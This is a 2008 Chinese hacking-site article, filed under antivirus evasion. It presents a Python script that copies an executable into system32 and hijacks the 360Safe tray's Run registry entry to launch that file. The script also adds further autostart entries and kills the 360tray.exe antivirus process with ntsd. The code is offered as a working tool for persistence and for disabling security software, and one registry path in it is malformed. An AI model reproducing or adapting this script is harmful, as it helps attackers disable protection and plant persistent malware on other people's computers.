用python修改注册表干掉360safe 浏览黑客文章黑客防线

黑客文章 - 免杀技术 - 浏览 - 用python修改注册表干掉360safe

用python修改注册表干掉360safe

http://www.hacker.com.cn/ 2008-5-5 0:32:20 黑客防线

文章作者：吴杰
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

import _winreg
import os
import shutil

#复制自身
shutil.copyfile('K3.exe','c:\WINDOWS\system32\K3.exe')

#把360启动改为自身
run = _winreg.OpenKey(
      _winreg.HKEY_LOCAL_MACHINE,
      "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0,_winreg.KEY_WRITE
      )

_winreg.SetValueEx(
      run,"360Safetray",0,_winreg.REG_SZ,
      r"C:\WINDOWS\system32\k3.exe"
      )

#添加自启动
self = _winreg.OpenKey(
      _winreg.HKEY_LOCAL_MACHINE,
      "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0,_winreg.KEY_WRITE
      )

_winreg.SetValueEx(
      run,"k3",0,_winreg.REG_SZ,
      r"C:\WINDOWS\system32\k3.exe"
      )
#添加所有用户启动
allrun = _winreg.OpenKey(
      _winreg.HKEY_LOCAL_MACHINE,
      "Microsoft\Windows\CurrentVersion\policies\Explorer\Run",0,_winreg.KEY_WRITE
      )
_winreg.SetValueEx(
      allrun,"k3",0,_winreg.REG_SZ,
      r"C:\WINDOWS\system32\k3.exe"
      )

#终止360进程
os.popen("ntsd -c q -pn 360tray.exe cmd")

所属分类: 免杀技术所属专题:

共有 1928 人次浏览收藏本页返回上一页

相关评论 (共0条, 查看所有评论)

发表评论

黑客文章专题

黑客文章搜索